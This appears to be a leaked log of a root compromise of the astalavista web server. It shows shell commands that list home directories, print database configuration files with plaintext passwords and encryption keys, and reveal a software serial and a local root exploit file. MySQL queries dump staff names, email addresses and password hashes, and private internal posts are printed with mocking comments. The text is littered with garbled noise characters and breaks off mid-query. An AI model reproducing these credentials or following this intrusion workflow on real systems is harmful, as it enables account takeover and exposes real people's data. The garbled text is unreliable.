: E8 D7 T9 L% Q! `7 V+ N1 idrwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap6 _9 t- ^5 o6 g+ ^! W
drwx——  2 astanet astanet 4096 Dec 23 12:18 mail
) `4 s' Y0 Q+ M9 U3 z' A% N-rw——-  1 astanet astanet  197 Jun  4 09:51 .mysql_history' B8 D9 j8 o( K3 I
lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
6 {2 |7 P. e0 X2 E# {/ S5 W-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow% P* e) f& x+ }9 m

: K  n, i% j" q* h, A  n7 |0 Ssh-3.2# cd auth/+ z: g% l3 _: o$ Y4 p: b& w
sh-3.2# ls -la
2 }) ~1 P9 c& Z8 q6 ~) G1 C+ [$ h6 [total 28
7 S  s8 a6 A% u+ odrwxr-xr-x 2 root    root    4096 Dec 23 16:00 .8 n2 i6 q: S6 v0 s; M+ \
drwx–x–x 6 astanet astanet 4096 Jun  4 09:51 ..7 H0 ?2 U5 o. R3 d; X( l- S3 ^
-rw-r–r– 1 root    root     321 Jan  5  2006 hackercontest.config.inc.php* |8 O& u8 F4 C# x, c3 ]& Z) t
-rw-r–r– 1 root    root     319 Jan  5  2006 hosting.config.inc.php  W" Z% f+ B+ p
-rw-r–r– 1 root    root      24 Jun  4 09:38 .htadm_pwd; Z$ P2 O5 f' R- _8 l" R" X
-rw-r–r– 1 root    root      49 Jan  5  2006 .htpasswd_newhosting
( M( I- J( f" r' e- ]: Y/ P# M3 a-rw-r–r– 1 root    root      51 Oct 11  2006 .htwebalizer_pwd* p7 ]7 D0 _# l  r

/ n% Q2 v1 t3 c7 Dsh-3.2# cat hackercontest.config.inc.php3 e. D! f3 ?+ {! F! E
<?PHP2 v# G4 A1 l$ r* D: i0 t& }
// Variabeln f?r Verbindung zur Datenbank //
6 v3 C7 M; ~& c; i3 _$conxHost = ‘localhost’;                       // MySQL hostname7 E" U6 T3 Y6 S0 t( m
$conxUser = ‘hackercontest’;                                       // MySQL user
/ h. f8 J' ?$ T; Y) g5 E( i6 ?- n$conxPassword = ‘K6m@7dUc’;                    // MySQL password0 r4 p! Q# d' ^% D
$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish/ {# h3 v# L1 A# l- r- M3 h) F
?>8 }+ B% V! a, @. b1 x6 f9 v; H1 f8 y
sh-3.2# cat hosting.config.inc.php# R! D: L6 u0 V+ w. a$ `: b7 ?
<?PHP- P* E, ^$ K# y7 q
// Variabeln f?r Verbindung zur Datenbank //. J0 c: M/ T* ^: \# }3 K" N
$conxHost = ‘localhost’;                       // MySQL hostname
0 R6 p  h! N" k3 O5 A( v$conxUser = ‘hostinguser’;                                 // MySQL user* B4 ~! L- |% T! j4 O) |6 L
$conxPassword = ‘cXvB3981′;                    // MySQL password
" f, b" G9 Z! w/ I1 o$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish' D: q1 h1 w2 U; ~8 {! L: m3 e
?>
& p! [. R/ f% O9 @9 h' I3 a4 u/ c* C+ [* J
sh-3.2# cd ..' L% m& V' K# E: s; Y
sh-3.2# cd com
5 R" ^: \8 m6 [: q# T' p- z4 wsh-3.2# ls -la- ]* e7 @+ j. e2 Q
total 141208
9 J/ p9 m9 R6 X) _8 ~drwx–x–x 10 com  com       4096 Apr 28 12:40 .7 R7 r2 v) t7 W7 k
drwxr-xr-x 14 root root      4096 Mar 11 17:56 ..4 |0 l. p, _9 F
drwx——  2 com  com       4096 Jun  4 04:04 backups
$ |/ ^# Y7 A9 H& R-rw-r–r–  1 root root   2419504 Sep 28  2007 backup.sql
* X% Q1 |! Z8 p7 Ldrwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system
$ y9 x' p- N# q/ D-rw——-  1 com  com      21880 Jun  2 08:07 .bash_history: I+ q* c% \  c
-rw-r–r–  1 com  com         24 Sep 24  2007 .bash_logout
! _1 ~1 T7 l% `-rw-r–r–  1 com  com        176 Sep 24  2007 .bash_profile
8 F. k1 b+ g& z3 I-rw-r–r–  1 com  com        124 Sep 24  2007 .bashrc
" x# z/ G; p0 U' ~/ e3 Sdrwx–x–x  3 com  com       4096 Jan 29  2008 domains4 y% X2 T8 ~! K  P$ H
-rw-r–r–  1 com  com      16409 Jul 16  2008 FWUser.class.php.fixed
  B! q& U8 A/ U, \3 {( Edrwxrwx—  3 com  mail      4096 Jan  6 19:24 imap
  ]8 B; k* k. o, i2 n4 Q-rw——-  1 com  com         69 Nov 18  2008 .lesshst. q1 a& Y' U& Z
drwx——  2 com  com       4096 Sep 24  2007 mail
  Y  [4 G4 d1 `; P1 @1 \! S-rw——-  1 com  com      13970 Mar 28 21:42 .mysql_history
+ u% s+ V- K0 Edrwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp
- s3 k% S- w; o0 Q. b5 l  s5 Rlrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html -> ./domains/astalavista.com/public_html& I) Q0 R1 x6 {3 V5 J+ f
-rw-r—–  1 com  mail        34 Sep 24  2007 .shadow
" @! v, q1 ^; }( i: w- qdrwx——  2 com  com       4096 Aug 26  2008 .ssh* ?8 J4 Q" G! u3 k
-rwx——  1 com  com       8515 Feb 10  2008 t; X9 }6 i# J; w+ h" S* P+ x3 G1 e) q4 n( g
-rw-rw-r–  1 com  com       6265 Feb 11  2008 t.c$ f3 q; W3 C, U2 ]" u# w/ w
drwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp
! X- N2 m3 r# C( K+ L" o4 m; Z-rw-rw-r–  1 com  com        617 May 20  2008 .toprc
7 G" Z& y+ v% j! V8 a$ L-rw-rw-r–  1 com  com  141851766 May 19  2008 version2-backup-20080519-0900.sql
1 R1 k1 q( K) C  j$ P- Q! p-rw——-  1 com  com      16629 Mar 28 21:46 .viminfo- b0 Q4 [( d+ Y1 {
-rw-rw-r–  1 com  com         51 Aug 25  2008 .vimrc
- P. }5 ~* e& n2 E3 i, Q3 ^4 R" v: r( u5 [2 O' W, E
sh-3.2# head t.c
% \$ M" z. h0 f) j- i/*
* A6 v- |) i) O  R" p; a: b. d* jessica_biel_naked_in_my_bed.c; i: ~& A! n; n% ^( g) ^! q
*9 R; B9 E& S3 r, W" u
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
  `/ r* P6 `8 N: Y5 B+ [* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.# ]3 g3 a9 c2 U5 L+ O2 s! K
* Stejnak je to stare jak cyp a aj jakesyk rozbite., K- C( [4 `; Z6 \3 |- {) X
*- Q/ @5 d: y* V( y7 }' t4 E/ Y" B
* Linux vmsplice Local Root Exploit8 z8 W! r% }3 }+ M' x7 c' v
* By qaaz
: O# x, T" D6 q# }( d, i0 `6 ^8 x*: A8 A4 L5 D! ^
+ s) L! ~- M0 ~* L, z
sh-3.2# cd /# L3 j" Q! Q  E- T
sh-3.2# ls -la" |$ @1 A' p7 N2 z4 {' J0 E
total 360# j* s6 f# c6 I7 T+ x$ x- f
drwxr-xr-x  25 root root   4096 Jun  3 02:43 .
: G/ w1 T# g) O+ k6 @drwxr-xr-x  25 root root   4096 Jun  3 02:43 ..0 h% e( l4 ^3 c( g
-rw——-   1 root root  10240 Jun  3 02:39 aquota.group! E2 Y$ W# f7 z3 B2 {1 k
-rw——-   1 root root  10240 Jun  3 02:39 aquota.user, Y* ^: I$ v9 x; ?
-rw-r—–   1 root root    819 Jul 17  2008 astalavista.us.db& j' F0 p8 n$ m0 f! ^$ X1 n
-rw-r–r–   1 root root      0 Jun  3 02:43 .autofsck: }5 x$ g' I/ v5 O, j% i
-rw-r–r–   1 root root      0 Sep 16  2007 .autorelabel
5 `6 _" h$ p: d# J% }- }3 ydrwxr-xr-x   3 root root   4096 Dec 29  2007 backup7 m! J/ n; `/ ]+ t2 d
drwxr-xr-x   2 root root   4096 Jun  4 04:03 bin
9 `+ n% n, x5 q1 _2 Cdrwxr-xr-x   5 root root   4096 Jun  2 14:06 boot4 F( l: R: U# j8 J5 j
drwxr-xr-x  11 root root   3620 Jun  3 02:43 dev
+ E. {/ e0 V7 V" u, O# Zdrwxr-xr-x  84 root root  12288 Jun  4 03:16 etc
" g; b$ _! F2 W- tdrwxr-xr-x  14 root root   4096 Mar 11 17:56 home
: u; w2 V3 \- V# A-rw-r–r–   1 root root  13387 Mar 20  2008 httpd.conf1 }& H; F) n: \0 Z& \6 k% ]/ m
drwxr-xr-x  11 root root   4096 Jun  4 04:02 lib- I" }; ]. `: \: A+ X9 s
drwxr-xr-x   7 root root   4096 Jun  4 04:03 lib64, I* T5 O% W/ t) Q3 P' a
drwx——   2 root root  16384 Sep 11  2007 lost+found/ n  w' l  I% V: G+ e4 A* Y! m4 I
drwxr-xr-x   2 root root   4096 Mar 11 17:56 media9 l* C$ h! \& P% a  {- W2 b
drwxr-xr-x   2 root root      0 Jun  3 02:43 misc
2 X; `; {( N# D+ I& zdrwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt, N# S$ j/ @% m% n/ u
-rw-r–r–   1 root root   5859 Feb  3  2008 mrtg.cfg
  O! K3 F1 t- Q/ Tdrwxr-xr-x   2 root root      0 Jun  3 02:43 net* U2 Q4 M4 p: X; L5 F$ L
drwxr-xr-x   3 root root   4096 Mar 11 17:56 opt
1 s& H5 o' q1 m: J1 x* Tdr-xr-xr-x 264 root root      0 Jun  3 02:42 proc
& w3 i. C) G8 Fdrwxr-x—  15 root root   4096 Jun  4 08:40 root) M' M6 d& J! D' X6 B4 U5 w" l
drwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin1 F2 G( c* i; e7 Q- J
drwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux
% o# V# q* f! ]% ddrwxr-xr-x   2 root root   4096 Mar 11 17:56 srv
, K& u9 P0 W3 E" W9 O8 Idrwxr-xr-x  11 root root      0 Jun  3 02:42 sys
9 u7 h4 F; g; f; v; Ndrwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp# G8 b3 a4 \5 K8 z
drwxr-xr-x  16 root root   4096 Jun  2 13:56 usr
% e" H1 {- Q. j; Y/ Udrwxr-xr-x  26 root root   4096 Jun  4 03:16 var
6 Y+ L. @6 c% b4 V5 F2 X  Q
2 j' |3 i8 @0 J2 d6 Q: K, _sh-3.2# cd opt4 a8 o$ L  u: g7 H* f
sh-3.2# ls -la
+ O' R: u( `  d5 `& ?$ xtotal 20/ n, G$ B3 U) H: Q0 ~& g
drwxr-xr-x  3 root root 4096 Mar 11 17:56 .
+ z5 \& ^, b6 Wdrwxr-xr-x 25 root root 4096 Jun  3 02:43 ..
; N% @8 A3 m+ e! Jdrwxr-xr-x 15 root root 4096 Mar 20  2008 lsws
  O8 K% M# B' A. R! ~: y3 X
: Z9 B7 N* L" F9 _sh-3.2# cd lsws/
; Q9 A6 ^6 t' G6 q/ t4 Esh-3.2# ls -la# R( ^# y) R; g
total 108
9 p! T# S* @/ Ydrwxr-xr-x 15 root   root    4096 Mar 20  2008 .
  _2 _1 g) m  T& @0 [drwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..
2 _  j) T2 E# I6 a, Adrwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons
3 ]/ y% W6 V8 ?& E& M  ydrwxr-xr-x 13 root   root    4096 May 29 15:10 admin! s  q( J, ~5 J1 P* o% R: r
drwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate, `6 C2 r9 b' L7 U% ?* P
drwxr-xr-x  2 root   root    4096 May 29 15:10 bin
, }: h% p! |2 I) z2 @- ?1 i7 Zdrwx——  4 apache apache  4096 Jun  3 02:43 conf, W7 I+ u& h$ t# f. h
drwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT
% U" m( X* h! W. f2 ]- O3 M: Ndrwxr-xr-x  2 root   root    4096 Sep 15  2008 docs
9 L! l! ?8 f+ [# [0 h9 v: P% ndrwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin3 X9 y# p+ F$ ~/ F3 Z# u
drwxr-xr-x  2 root   root    4096 Sep 15  2008 lib
% C; T$ l8 e* C-rw-r–r–  1 root   root    6959 May 29 15:10 LICENSE% O2 e! ~1 m; c
-rw-r–r–  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP
" j, x2 u& [' P-rw-r–r–  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL1 c& _. u+ }# Z9 K
-rw-r–r–  1 root   root    3208 May 29 15:10 LICENSE.PHP6 c. h& \3 C3 n% e- s1 }
drwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs3 O0 }, `' `0 V( I5 C
drwxr-xr-x  2 root   root    4096 Mar 20  2008 php
3 ?. ?0 ~# n2 y! k" Rdrwx——  2 apache apache  4096 Mar 20  2008 phpbuild: V; \7 f" _& {0 f9 }  M. c
drwxr-xr-x  3 root   root    4096 Mar 20  2008 share
6 h9 D$ B( W4 Z9 K& h-rw-r–r–  1 root   root       6 May 29 15:10 VERSION) `2 w& b4 ]4 L

3 G: r, e1 i; W8 I+ T: hsh-3.2# cd conf% D+ \% y7 _' a+ Z9 G( y, w
sh-3.2# ls -la
3 D+ S. y3 J% O+ t9 Dtotal 48
$ c0 X/ k1 e" J* X- H* {9 wdrwx——  4 apache apache 4096 Jun  3 02:43 .
! F- A" t2 }0 xdrwxr-xr-x 15 root   root   4096 Mar 20  2008 .." {" C. P5 w9 D0 i
drwx——  2 apache apache 4096 Mar 20  2008 cert
+ p, v9 ]2 a# o4 ~& j) r7 o-rw-r–r–  1 apache apache 6668 May 29 15:13 httpd_config.xml
% d$ S+ p/ v/ o9 N0 A-rw——-  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak9 I8 }/ G3 B7 ^" N" ?1 _9 ~
-rw-r–r–  1 root   apache    0 Jun  3 14:11 .last. Q# N% h3 _! z
-rw——-  1 apache apache  256 May 29 15:10 license.key0 p$ `7 `0 _! y' T
-rw——-  1 apache apache  256 Mar 21  2008 license.key.old1 B7 ^' \! A3 C7 Y2 }; u
-rw——-  1 apache apache 3320 Mar 20  2008 mime.properties/ }/ N7 O0 y: E
-rw——-  1 apache apache   20 May 29 15:10 serial.no
' x  L4 J' ?! \. e* N: n4 Sdrwx——  2 apache apache 4096 Mar 20  2008 templates
. M( T, _' [4 i
  Y- l, ^& g" j( k+ p2 e- qsh-3.2# cat serial.no
! U( |& \4 S$ [IbDl-oVsO-CKqL-wVRa/ X: R) T8 C2 C
% e2 s. V- m, s1 P3 g7 l1 q: U
sh-3.2# mysql
5 B7 [- m8 W5 l% T8 E; e( bWelcome to the MySQL monitor.  Commands end with ; or \g.+ @; g7 |9 z+ f( Y4 \/ \9 ]! F
Your MySQL connection id is 286844
. |6 N: Z' S) u+ ]Server version: 5.0.45-community-log MySQL Community Edition (GPL)
: ~( J) |- s* S4 S9 p2 ~5 w- v0 b9 t% A
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
( q' a6 L  a3 X9 P0 Y, d2 n- v, Z9 W7 H: x% M! H# ]9 e4 @* ~9 p
mysql> show databases;, W& i& \+ i) `8 ~
+———————–+) {- i( ^2 r7 |8 E! z
| Database              |
0 k; N) X2 E9 }! Z' ^+———————–+
: n/ N  @- [8 z4 K4 w  C. J2 s| information_schema    |+ z+ X! I+ a4 Y+ {* k& m, y
| astanet_ads           |
+ D( K$ u5 {2 a8 _  h& d, T( B| astanet_mailing_lists |
9 p) J- X1 ]/ L( C, W! R| astanet_mediawiki     |& _" }9 t- \' I5 M" I
| astanet_membersystem  |
2 T5 p: D7 w' n9 P- k| com_contrexx          |. ]7 Y6 k. U; V9 M9 s( X3 w* N
| com_contrexx2         |
" E% M6 n. A6 e0 d4 k' h( ^  s- O* c| com_contrexx2_live    |
% g7 I! ]( q9 m- b0 v& t1 H7 t" h| da_roundcube          |
. X& [5 ?  I2 J# [; [| dolphin               |! K" H- D0 \8 J8 Z1 p& E
| ideapool              |
, z7 b# E" g; y5 R9 C| mysql                 |% Z1 O- K5 P% }( r5 W# k
| test                  |
: o$ `6 f7 S7 o, i" c6 H5 y' o( y| yourmaster            |
' S- {/ k0 H( j- r' p+———————–+
1 r# k8 T2 {# q, u14 rows in set (0.00 sec)6 ]4 c# R6 j3 U% ]3 {1 i. F% Y
  ?% V, c# D9 q* y
mysql> use ideapool
: w( P" z2 n* L9 y2 m1 D/ Y$ UDatabase changed* O* I. W& v1 k2 |6 J; |1 c& Q+ A
mysql> show tables;
! Q; u0 A! c: C/ m, ^+———————————–+  h- `! o9 l: ^  z9 O. n
| Tables_in_ideapool                |/ p1 ]( Y4 p" |1 V, i6 Q" h, q, t8 Q7 L
+———————————–+7 h; u( b/ b8 e: b, n0 ]
| eventum_columns_to_display        |& B' H" j0 k/ J9 V3 y5 |3 x7 |/ }
| eventum_custom_field              |- T7 O5 |0 t' C1 A* h2 A
| eventum_custom_field_option       |
+ p9 ^& E8 P& Y| eventum_custom_filter             |
+ ?" d. o- r+ o; u. E6 B% k; u/ c| eventum_customer_account_manager  |
% a/ j' @' Z$ ~7 q9 ?- f| eventum_customer_note             |4 i' J& U0 Y) y( M- e  }
| eventum_email_account             |- F/ h! ]6 R4 o) |. d/ b! A$ a8 g8 L9 n
| eventum_email_draft               |
# x! l; |" U  [3 z| eventum_email_draft_recipient     |
# g- h8 B, y; p: _| eventum_email_response            |
$ [* o) a* F. k# W| eventum_faq                       |1 m' V! T- W) ~# m, I- n
| eventum_faq_support_level         |& ]3 S1 y; y* M# O( N* C7 U; \
| eventum_group                     |) ~& I4 b) L5 _$ G) T5 ^- e
| eventum_history_type              |
: N# L& r1 C) i6 u| eventum_irc_notice                |
6 ~0 b3 ~& [" A- D| eventum_issue                     |
1 P6 Q, Y" n- h& _) J| eventum_issue_association         |( H9 \" ~+ B" {% E0 b2 ~3 h9 ]# `
| eventum_issue_attachment          |
6 U3 X2 z6 q. L8 l- u| eventum_issue_attachment_file     |; x* Z5 N  r! K+ Y" Y& [# _4 j
| eventum_issue_checkin             |6 U5 C5 ~/ r+ J0 D7 `) S: p6 e0 _
| eventum_issue_custom_field        |
' R( i: p9 x6 [; S2 K/ T, b" f| eventum_issue_history             |, I; m( ^4 ]# r$ T: j4 D7 B: T; X
| eventum_issue_quarantine          |5 m$ q, F- [1 _
| eventum_issue_requirement         |
8 @& F  `1 ]. `9 F0 a* _* r# J. A& _| eventum_issue_user                |
8 z9 N0 l  N8 I7 ]$ l| eventum_issue_user_replier        |7 \0 k7 b" f+ L1 q
| eventum_link_filter               |9 d! @3 j' O- }4 X* m
| eventum_mail_queue                |; T9 ~3 X5 u3 g; u
| eventum_mail_queue_log            |
. ^; n9 M. C3 D: t$ f# \8 c( a* l| eventum_news                      |" [4 a4 x% X: ]& P: _2 a
| eventum_note                      |$ Y) J8 \4 c5 q6 R/ j. w- M- Q
| eventum_phone_support             |4 V1 Y6 G+ N* D0 H4 U" ]
| eventum_project                   |
$ a1 j! `% M6 b) ~| eventum_project_category          |
% P  z$ ~' f% b& |; J5 B6 S& i| eventum_project_custom_field      |
/ ]' T: b$ d5 M" s. h. P/ r| eventum_project_email_response    |
3 B, q% K2 e7 N8 A# @/ Q% O! H| eventum_project_field_display     |
  {6 D, s/ ]) \: M6 u2 @( f| eventum_project_group             |2 o, l' o0 |0 i# v. M/ N5 c
| eventum_project_link_filter       |
! V( h+ A; `8 e# y! `0 [" X2 s0 K| eventum_project_news              |
' a' F% S+ C$ s0 Z| eventum_project_phone_category    |
, j5 q7 K4 S% u* [| eventum_project_priority          |
; H: Q1 F: n" H  ~  }| eventum_project_release           |
" g$ Y" B, s: i8 h| eventum_project_round_robin       |' H& [4 v$ c: u# n5 e
| eventum_project_status            |& y' x7 V% j% r6 _8 R. V: w/ V% \
| eventum_project_status_date       |' r/ a! _7 x! Y1 {9 s
| eventum_project_user              |" p: T. [% T  r( [. \+ ]
| eventum_reminder_action           |9 N( t- o! k- T) z0 k
| eventum_reminder_action_list      |
" {; g5 r3 g, ~2 r" j| eventum_reminder_action_type      |% t: t  K$ N+ r& S/ r0 K
| eventum_reminder_field            |& C4 d5 m/ ?6 M- K7 y
| eventum_reminder_history          |
. m1 i6 [6 V* {" j9 o| eventum_reminder_level            |
7 V& X. O. ~! Q1 }( x| eventum_reminder_level_condition  |" u+ f% w' `, `# b0 n
| eventum_reminder_operator         |- d1 A. ^3 Z8 S
| eventum_reminder_priority         |. h' K/ H( m: m
| eventum_reminder_requirement      |; d5 m! m" L6 _1 j2 `9 t
| eventum_reminder_triggered_action |% Z6 P! C( `) A4 e7 i0 ^" @6 v
| eventum_resolution                |7 T1 W5 D2 ~# G6 ~/ h! y3 i+ q* B
| eventum_round_robin_user          |
4 f8 o& E% `4 I" ^7 w0 A| eventum_search_profile            |2 z+ Q2 V: c& s  i
| eventum_status                    |7 R/ C* i7 T5 C8 H0 f* p" a/ s
| eventum_subscription              |
2 r% g# k0 n% r3 W4 Y& s| eventum_subscription_type         |
1 k/ O3 k' k4 T6 b% P* L0 d| eventum_support_email             |: o# e7 L0 B- Y4 S" ~
| eventum_support_email_body        |! ^$ @/ A' ~7 X
| eventum_time_tracking             |& b: C+ i6 c& A% k/ z
| eventum_time_tracking_category    |' i1 d& X( M: ?0 M
| eventum_user                      |
3 ]  W1 h/ M# {8 ^+———————————–+
% W! r: ~1 k# d69 rows in set (0.00 sec)6 w3 \$ p8 C7 v' m
" X( j+ L* F/ M+ f
mysql> describe eventum_user;
6 z2 i  h/ z+ k9 t# B+————————-+——————+——+—–+———————+—————-+
  N( y2 m$ m5 t2 N- l| Field                   | Type             | Null | Key | Default             | Extra          |7 V4 \! ?6 H3 h' C% J' B
+————————-+——————+——+—–+———————+—————-+$ q1 X- Y# q# l$ u& i0 ]
| usr_id                  | int(11) unsigned | NO   | PRI | NULL                | auto_increment |
6 a8 A' ^  y+ w3 E: b2 Z| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL                |                |
0 s- L4 F$ \5 d. @8 {! ]& d| usr_customer_id         | int(11) unsigned | YES  |     | NULL                |                |4 J0 }0 F$ {! N. b- `1 I& Y  @
| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL                |                |
, I3 z/ E9 S; K" k0 Z8 N! z| usr_created_date        | datetime         | NO   |     | 0000-00-00 00:00:00 |                |
0 L+ D  M% \9 d| usr_status              | varchar(8)       | NO   |     | active              |                |
  l! t" B# _- T* F| usr_password            | varchar(32)      | NO   |     |                     |                |* a2 Z. `" t$ o; f* c8 x
| usr_full_name           | varchar(255)     | NO   |     |                     |                |
6 ]" q9 {& k+ e: `| usr_email               | varchar(255)     | NO   | UNI |                     |                |
! k& Q! p" K+ n, R- n| usr_preferences         | longtext         | YES  |     | NULL                |                |5 m' g5 N. H6 Y# \! L
| usr_sms_email           | varchar(255)     | YES  |     | NULL                |                |
! U% T2 t# [7 s| usr_clocked_in          | tinyint(1)       | YES  |     | 0                   |                |
  {+ K# B5 j  N! k/ f: v| usr_lang                | varchar(5)       | YES  |     | NULL                |                |7 C- D" t" a4 h& K" h
+————————-+——————+——+—–+———————+—————-+
# F) }" a% i  m3 k: [' S13 rows in set (0.00 sec)0 X, L( G4 T% T1 q* |: |
' L* s3 y: m6 A) [" r1 U4 I9 D' i
mysql> select usr_full_name,usr_email,usr_password from eventum_user;" F" }$ R  L$ x/ C4 |2 q
+———————-+——————————-+———————————-+) O  H5 F! K3 o  N' c) i
| usr_full_name        | usr_email                     | usr_password                     |2 x5 f+ K! R! b5 I) l! R
+———————-+——————————-+———————————-+, u+ m7 Z! S' A& T2 `) @
| system               | 链接标记system-account@example.com    | 14589714398751513457adf349173434 |  F! _' Y  d- i% f
| Developer (Paulo)    | 链接标记paulo.santos@astalavista.ch   | 26a35a1cf8895c27fb37ef4cf149f7bb |
" Q/ @. Z3 e. g1 i4 ?, ^! N| Be1er0ph0r           | 链接标记be1er0ph0r@gmx.de             | 229766dc0ca1fb67160a8782321dfdce |1 p% z, X9 [( F: g- h
| Admin                | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |/ s. k/ |; U4 I+ B5 g
| ADMIN                | 链接标记admin@astalavista.ch          | f6fdffe48c908deb0f4c3bd36c032e72 |
! U% }7 n, {. P/ W6 J| USER                 | 链接标记user@astalavista.ch           | 5cc32e366c87c4cb49e4309b75f57d64 |  E  B9 c) @; Z0 B. ?
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com       | f7735ab119023a8abb2301e67f81cd67 |$ Y7 r6 |% q: M% ^# E7 C
| Joao                 | 链接标记joao.pontes@astalavista.net   | f805c071d7c823b937448c54c047b9fd |
8 A4 x" x8 p2 w- \| Pascal               | 链接标记pm@astalavista.ch             | e10adc3949ba59abbe56e057f20f883e |
' F3 Y/ Q4 U" z3 s2 g. `5 Y| commander            | 链接标记commander@astalavista.com     | 932cd250918f881d41feb0b93883a926 |
3 |2 ^) T) S! V8 i# [/ k0 a) \) @3 k| ishtus               | 链接标记ishtus@astalavista.com        | a587ffc88b3dbbba3fd2fe67af649ff0 |9 \7 A) D; `- T7 `9 P( U/ w
| sykadul              | 链接标记sykadul@astalavista.com       | 20224a2f3eeb57a13a10b4df543c128e |
/ k: w$ S2 e% k| Zach McElroy         | 链接标记admin@badfoo.net              | 33c5d4954da881814420f3ba39772644 |
7 M# w4 L' }; l1 G1 P$ `| usb                  | 链接标记usbenigma@hushmail.com        | b513f22c3db6932855ad732f5f8a10a2 |
! W5 u- F* u7 `0 K8 C/ i4 C) X| cyph3r               | 链接标记cyph3r@astalavista.com        | 6e1e50017a945e874d52ec91f9ab2cee |# C( v3 @+ W! G6 h8 O! R) }4 ~+ k8 n
+———————-+——————————-+———————————-+
  o# Y; `; d! i/ t15 rows in set (0.00 sec)
; H# w5 s% {( t" T1 z
( ^0 C6 z# [2 _7 d0 o- lmysql> select iss_description from eventum_issue where iss_id = 43;0 g: `. j2 h8 Y! t' V0 E
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+8 W& k, B( P- g  \8 P' K
| iss_description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                " |0 r3 N# W% W4 a- ?7 u5 g# x
|
+ W( u$ B: f7 D( R. z+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
( A: t( t$ e) v( K| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be+ T9 U* ?8 [+ y4 ?. U6 E8 n
connected for 90 mins… 120mins… so what i propose is something like:
7 R5 [+ M; R3 S- R链接标记[url]http://www.surfthechannel.com/[/url]/ q- L- v5 q& d6 m' z/ L
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
5 z9 R3 G+ I6 w& _like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t* Q. \& b2 O! B2 Y* H2 [
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off2 r( B( A. n6 E
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…( ?3 p* x; v- j, h
$ B- m* N# k* w' n* s- V- v
We could also put advertisement during play on the flash video player itself… extra $$…  \3 g' S3 D6 ]( P3 ^% ]1 X! c

" R7 G7 a* P2 V' P8 e$ ?By sykadul |- y) \2 l+ f( ]$ @& J5 w. O
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+- H& J7 ?% h* u9 D; R2 Z' h& F
1 row in set (0.00 sec)9 [8 r8 A5 }6 _8 W( ]" f

! P2 L- v3 P# o// Money and extra $$ is all they care about. remember that.' e+ ]1 X- f0 V3 h
9 Q5 H' H5 J  L9 U1 W. D
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
& z. L: m1 s- p  F4 E+ k+————————+——————————————————————————————————————————————————————————————————————————————-+# R5 {# j1 a3 t8 Z2 j  ?
| iss_summary            | iss_description                                                                                                                                                                                                                          3 i3 f; C5 C6 W1 c5 d% Z
|+ A1 X, Q/ x- v8 n
+————————+——————————————————————————————————————————————————————————————————————————————-+2 N6 q) @4 m, y( i
| Forum for REAL EXPERTS | Hello,1 C* b4 d# T' ?2 _$ T

6 |, t  X; q0 d! q9 c: y( u- J2 eIshtus and I,
# N1 R( k( g, _
5 w' |+ P* y$ ~( C' j" Y- n" ^Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide3 U# w( P6 n3 a+ [6 x4 K
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..( o3 k# c7 h$ a
& I3 d. E' f* z4 f8 F
One example a friend of mine from coresecurity.com!
) T% N; ^  X: y* D; {
+ U* F7 T; v, k6 MWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..0 U/ |( X+ f- E( b* L
2 y! A- \. W* x' \, d2 F
|
7 Z$ V' D, c' t" t+————————+——————————————————————————————————————————————————————————————————————————————+( @+ s+ {% w' B$ Z; a* y$ L
1 row in set (0.00 sec)! Q: I/ L2 Z$ e6 |. D6 S

1 p$ J& F8 N% I0 B0 u: V8 _3 V// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
4 }+ B! `) |8 W/ `) A& f. I9 T0 Z* g4 l' J) m$ _- ]4 y" v
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
2 W# y1 n# a8 U( e* o3 S8 g) i+——————+———————————————————————————————+% m- o+ g( v% O" o9 V
| iss_summary      | iss_description                                                                             |
9 _8 ^. b- X) c5 U+——————+———————————————————————————————+
